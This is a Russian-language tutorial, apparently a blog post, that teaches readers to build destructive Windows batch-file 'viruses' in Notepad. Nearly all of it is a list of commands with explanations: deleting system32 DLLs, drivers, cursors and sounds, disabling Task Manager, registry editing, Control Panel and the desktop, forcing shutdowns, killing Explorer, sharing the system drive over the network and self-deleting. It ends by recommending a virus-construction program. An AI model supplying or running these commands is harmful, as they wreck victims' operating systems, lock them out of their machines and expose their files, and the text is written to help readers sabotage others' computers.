Привет!

В этой статье расскажу, как создавать вирусы, используя штатные средства Windows и не только.

Начнём мы с создания так называемых ВАТ-файлов или просто bat’ников, для этого нам понадобится всего лишь стандартный блокнот.

Создаём файл *.txt и открываем его. Теперь пишем в него определённые команды, примеры которых вы видите ниже:

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul – Запретить комбинацию клавиш Ctrl-Alt-Del

del %SystemRoot%\system32\*.dll /q >nul – Удалить все системные DLL(Динамические загружаемые библиотеки)

del "%SystemRoot%Driver Cachei386\driver.cab" /f /q >nul – Удалить все драйверы, установленные на компьютере

%SystemRoot%\system32\rundll32.exe user32, SwapMouseButton >nul – Поменять местами значения кнопок мыши

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Restrict\Run /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul – Делает невозможным запуск приложений

time 0:00 >nul – Поставить время на 00:00

reg add HKCU\SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul – Запретить редактирование реестра вручную

del %SystemRoot%\Cursors\*.* >nul – Удалить курсор мыши

del %SystemRoot%\Media /q /s /f >nul – Удалить системные звуки Windows

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul – Запретить вызов панели кправления

reg add HKCU\Software\Microsoft\Windows\Current\Version\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul – Убрать рабочий стол

shutdown -r -t 1 -c "lol" -f >nul – Форсираванная перезагрузка ПК

shutdown -s -t 1 -c "lol" -f >nul – Форсированное выключение ПК

taskkill /f /im explorer.exe >nul – Убить процесс Explorer.exe

net share ResName=%systemdrive%\ >nul – Расшарить системный диск

label %systemdrive%=Диск1 >nul – Переименовать системный диск

msg * "Текст сообщения" >nul – Показать Windows-стилизованное сообщение с кнопкой ОК

del %0 >nul – Самоликвидация вируса

А теперь обьясню код.

Команда del удаляет определённый файл, после неё в кавычках пишется полный путь к файлу, если вы хотите удалить из папки все файлы, например с расширением txt, то после названия целевой папки и \ нужно написать *.txt. Если нужно удалить что-нибудь из папки Windows, проще будет написать %SystemRoot%, вместо полного пути к папке, а уже затем вводить остальной путь. Также получившийся вирус может самоуничтожаться, для этого вместо пути к целевому файлу нужно ввести %0. Команда reg add может редактировать реестр. Для этого после этой команды нужно написать полный путь к необходимому вам ключу(без кавычек), и его новое значение. Команда time просто устанавливает любое время на часах ПК. Команда shutdown выполняет выключение или перезагрузку ПК, если после команды стоит r -t 1 -c "lol", то произойдёт перезагрузка, а если -s -t 1 -c "lol", то выключение. Также можно добавить в конце –f через пробел, тогда операция (выключение или перезагрузка) произойдёт форсированно, т.е. без предупреждения пользователя.

 Команда taskkill /f /im убивает указанный процесс, который указывается через пробел с расширением. Также существует команда net share, которая расшаривает (открывает общий доступ из сети) определённый диск на компе(%systemdrive% -- системный диск, обычно это C:). Комадна label переименовывает указаный диск. Команда msg * выводит на экран окно с сообщением, указанным в кавычках. Теперь, когда вы записали необходимые вам команды, сохраните созданный *.txt с расширением *.bat.

Также вы можете писать подобные вирусы не вручную, а используя спец. программы(конструкторы вирусов). 

Рекомендую одну такую программу, это BAT Virus Master. 

Спасибо за внимание, Удачи в написании бат-вирусов:)